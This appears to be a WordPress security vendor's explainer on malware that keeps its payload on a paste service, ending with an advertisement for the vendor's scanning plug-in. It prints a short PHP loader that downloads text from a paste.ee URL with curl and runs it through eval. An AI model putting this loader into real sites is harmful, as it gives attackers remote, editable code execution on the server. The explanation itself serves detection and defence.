This section describes malware that uses a text copy and paste service in WordPress.
What is a text copy-paste service?
A text copy and paste service is a service that allows you to paste and store text online.
The most famous service is PATEBIN, but there are many other minor text copy and paste services.
Examples of malware using text copy/paste services
The following is an example of malware code that uses this text copy-paste service.
$url = "https://paste[.ee]/text slug";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval("?>". $result);
This malware reads the stored malware body and executes it with the eval function (a function that can execute text as PHP code) by means of a text copy and paste service.
The scary part of this malware is that the malware itself is not stored on the server, but on a remote copy-and-paste service that hackers can edit as they wish.
This means that hackers can rewrite malicious code and conduct hacking activities within the server as they wish. Anything that can be done with a PHP program, such as rewriting the database, creating new malicious files, rewriting content, or tampering with legitimate files, can be done on the server.
Detecting and Removing Malware Using Text Copy and Paste Services
This type of malware can also be detected and removed with our malware inspection and removal program.
Free] WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].
In some aspects, mechanical inspection of plug-ins has limitations against highly novel malware. If you do not know how to remove the malware, or if you are concerned that it has not been removed completely, or if reinfection is repeated, we recommend that you request professional removal of the malware.
